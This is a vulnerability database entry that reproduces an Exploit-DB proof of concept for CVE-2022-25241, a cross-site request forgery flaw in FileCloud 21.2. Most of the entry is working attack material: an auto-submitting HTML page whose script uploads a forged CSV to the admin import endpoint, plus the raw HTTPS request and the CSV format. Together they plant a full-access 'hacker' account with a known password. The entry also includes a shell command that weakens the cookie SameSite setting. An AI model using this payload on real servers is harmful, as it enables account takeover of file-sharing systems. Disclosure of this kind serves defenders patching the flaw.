FileCloud 21.2 - Cross-Site Request Forgery (CSRF)

🗓️ 21 Feb 2022 00:00:00Reported by Masashi FujiwaraType

exploitdb🔗 www.exploit-db.com👁 325 Views

FileCloud 21.2 Cross-Site Request Forgery (CSRF) allows unauthorized user creatio

Reporter	Title	Published	Views	Family All 12
0day.today	FileCloud 21.2 - Cross-Site Request Forgery Vulnerability	21 Feb 202200:00	–	zdt
ATTACKERKB	CVE-2022-25241	16 Feb 202202:15	–	attackerkb
Circl	CVE-2022-25241	16 Feb 202207:35	–	circl
CNNVD	FileCloud 跨站请求伪造漏洞	16 Feb 202200:00	–	cnnvd
CVE	CVE-2022-25241	16 Feb 202201:26	–	cve
Cvelist	CVE-2022-25241	16 Feb 202201:26	–	cvelist
EUVD	EUVD-2022-29938	3 Oct 202520:07	–	euvd
NVD	CVE-2022-25241	16 Feb 202202:15	–	nvd
OSV	CVE-2022-25241	16 Feb 202202:15	–	osv
Packet Storm	FileCloud 21.2 Cross Site Request Forgery	21 Feb 202200:00	–	packetstorm

# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)
# Date: 2022-02-20
# Exploit Author: Masashi Fujiwara
# Vendor Homepage: https://www.filecloud.com/
# Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2
# Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447)
# Tested on:
#  OS: Ubuntu 18.04.6 LTS (Docker)
#  Apache: 2.4.52
#  FileCloud: 21.2.4.17315
# CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)

# Conditions
1. Only vulnerable if cookies have samesite set to None (SameSite=None).
   echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php
2. Use https as target url (When cookies set SameSite=None, also set Secure).

# PoC (HTML)
<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">

<script>
function init(){
  myFormData = new FormData();
  let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,[email protected],Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'});
  myFormData.append("uploadFormElement", fileContent, "user.csv");
  fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"});
}
</script>
</head>
<body onload="init()">
CSRF PoC for CVE-2022-25241

Creat hacker user with Password1 via CSV file upload.
</body>
</html>



# HTTPS Request
POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1
Host: 192.168.159.129:8443
Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493
Content-Length: 365
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Connection: close

------WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv"
Content-Type: application/vnd.ms-excel

UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,[email protected],Password1,hacker,FULL,02/26/2222,Group1,YES

------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--



# CSV file format
UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,[email protected],Password1,hacker,FULL,02/26/2222,Group1,YES

21 Feb 2022 00:00Current

8.9High risk

Vulners AI Score8.9

CVSS 25.1

CVSS 3.18.8

EPSS0.03271